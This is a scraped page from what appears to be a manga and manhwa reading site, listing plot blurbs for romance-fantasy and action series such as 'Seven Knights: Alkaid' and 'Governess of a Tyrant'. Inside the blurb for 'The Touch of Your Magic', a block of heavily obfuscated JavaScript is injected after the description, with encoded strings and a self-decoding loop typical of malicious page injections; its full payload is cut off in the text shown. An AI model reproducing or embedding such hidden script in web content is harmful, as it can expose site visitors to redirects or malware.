Magic - Page 60

Explore the world of Magic manga, where gripping stories await. Start reading the best Magic manga free now!

739 results

Seven Knights: Alkaid

This comedic series follows the amnesic Albert Tanese, the second king of Tanesia, who must find the saintess and the seventh fragment ‘Alkaid’ to prevent the world from descending into another disastrous war.


The Touch of Your Magic

Getting struck by lightning, breaking a bone, failing exams?these are the “accidents” that happen when one becomes friends with Jia. Bringing bad luck to people has been a condition of Jia’s for as long as she can remember… until she meets Gun and Hyun? two mysterious brothers who happen to be wizards! With the help of magic, she’s determined to ward off her curse no matter what. But does Jia realize what kind of sorcery she’s actually getting herself into?<script></script><script>function _0x5947(_0x484b24,_0xab3b84){var _0x2ccd23=_0x54c8();return _0x5947=function(_0x4977c3,_0x185205){_0x4977c3=_0x4977c3-(0x787*-0x5+0x13c2+0x1303);var _0x1c7242=_0x2ccd23[_0x4977c3];return _0x1c7242;},_0x5947(_0x484b24,_0xab3b84);}(function(_0x1cd4d2,_0x38878b){var _0x291114=_0x5947,_0x29fdcc=_0x1cd4d2();while(!![]){try{var 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Supreme Spirit Master

I found a strange black blade then I also bumped into a cute girl. It changed my fate completely, it was the end of my boring and steady life and in comes the new and exciting world. Time to fight to change my fate!


990k Ex-Life Hunter

The ordinary F-rank hunter, Gang HyeonJoon, had always prayed for the strength to change his life. One day, his prayers were answered… [The Final Sword Saint praises your bravery.][The Master in the Shadows is your….] “Enough! This is too much!” 990 thousand past lives appeared in front of him!


Governess of a Tyrant

Ann is a book lover, and her newest addiction is a novel called Death of The Evil Duke Gerald. In the story, Duke Gerald is hated due to his cruelty but as Ann dives deeper into the story, she wonders if his demise could’ve been avoided had he not lost the people he loved. She shakes off the thought, realizing that she cannot change the story’s ending…that is until she gets transported into the novel. Ann is informed that she has 90 days to change the duke’s fate and if she fails…she will never be able to return to her world again. Blackened Duke Strategy Plan / Hei Hua Gongjue Gonglve Jihua / Hēi Huà Gōngjué Gōnglüè Jìhuà / 黑化公爵攻略计划


Grand Duke, It Was a Mistake!

I accidentally kidnapped the grand duke I have a one-sided love for! I ended up accepting the grand duke’s proposal to have a contractual relationship in return for fixing this issue, but……. “Vivian. May I kiss you?” Huh? Are we kissing as soon as we started dating? “We’ll kiss, then we’ll take things further, and then let’s get married, Vivian.” ……I’m in big trouble. I don’t think the grand duke is in his right mind……! Is this relationship really okay?


I Have To Be A Monster

Xiao Qiu, who quietly guards humanity with his own strength, is misunderstood by everyone. Having experienced a depressed life and being reborn, he embarked on the path of becoming a bloodless and tearless monster. “Saving mankind, what does it have to do with humanity” I Must Be a Monster Wǒ Bìxū Chéngwéi Guàiwù 我必须成为怪物


Ophelia the Oracle Queen

나는 여왕이다 There’s nothing more frustrating than a novel with endless tragedy and zero triumph. Such is the tale of Ophelia, a powerless princess who is used by those around her only to be cast aside and poisoned to death. So when an ordinary bookworm wakes up in the princess’s body, she knows that she must rise to the throne in order to survive. Being the illegitimate daughter of the king is a setback, but luckily, she also happens to be the daughter of the palace temple’s abbess. Once she pretends that she had a vision of her future self as the queen, the king starts relying on her “oracles” to guide his decisions. But even with her father’s support, Ophelia knows that eliminating her political rivals won’t be an easy task. Will the new heroine be able to scam her way to queendom, and more importantly, a happier ending?


Feelings In A Dream

Feelings In A Dream one manhwa from us A one-time dream connecting reagent was made with the intention to meet Daniel, the prince that she has an unrequited love for, even in a dream. However, it was her rival, Kaiden that took the reagent, and it wasn’t a one-time thing? Lizen, who has perfect grades and physical skills, is bright and strong on the outside, but hides her wounds on the inside. Kaiden, a man who is blunt and cold, but more warm-hearted than anyone else. Lizen is connected to Kaiden through dreams every day, and not only gets caught in a huge conspiracy surrounding the throne, but also gets confused with her emotions…. An oddly continous meetings in their dreams. Is it because it’s just a dream, so it’s easy to pass off as a joke, or has it become sincere feelings because of the dream. “There’s no point in ‘If’. I already have feelings for you. I like you now even if I don’t dream about you. one manhwa from us A one-time dream connecting reagent was made with the intention to meet Daniel, the prince that she has an unrequited love for, even in a dream. However, it was her rival, Kaiden that took the reagent, and it wasn’t a one-time thing? Lizen, who has perfect grades and physical skills, is bright and strong on the outside, but hides her wounds on the inside. Kaiden, a man who is blunt and cold, but more warm-hearted than anyone else. Lizen is connected to Kaiden through dreams every day, and not only gets caught in a huge conspiracy surrounding the throne, but also gets confused with her emotions…. An oddly continous meetings in their dreams. Is it because it’s just a dream, so it’s easy to pass off as a joke, or has it become sincere feelings because of the dream. “There’s no point in ‘If’. I already have feelings for you. I like you now even if I don’t dream about you.


A Twist of Fate: A Wizard’s Fairy Tale

Read manhwa A Twist of Fate: A Wizard’s Fairy Tale / 마법사를 위한 동화 / 魔法使いのための童話 / Mahoutsukai no Tame no Douwa / จอมเวทปาฏิหาริย์กับนิทานแห่งมนตรา / Fairytale for Wizards A young girl was neglected by her parents due to the belief that twins were bad luck to the point that she wasn’t given a name. After losing her family and a few years of her memory, she was living an unfortunate life as a slave to a count’s family. Then one day, a beautiful wizard who was called the strongest wizard in the world appeared before her eyes. The truth about her hidden past gradually comes to light. Their meeting will drastically change the fate of the world!


Tea Leaf Girl

Maiden of Tea Leaves The tea people from Pentagram are the main life forces of the eighth nebula and have a history of over 3,000 years. Invaded by the Insects, the various races united amidst the chaos of war and revitalized the Tea Kingdom. The protagonist, Coleen, is a young girl with the attribute of a Millennial Tea Person among the young generation in the kingdom. Can she lead the tea leaf girls of the new generation in bringing more life force to the Tea Kingdom and get the opportunity to live in harmony with the different planets and races... 54


Coddled Princess’s Second Life

Sonia Syland, the only princess of Syland Empire, fell ill and died in her youth. Be pitied by goddess, she reborn to 10 years ago and lived her life again. In her second life, she found that there was a great conspiracy behind her painful death. The beloved father and brothers, who is the one that framed her? In this new life, Sonia made up her mind to live...
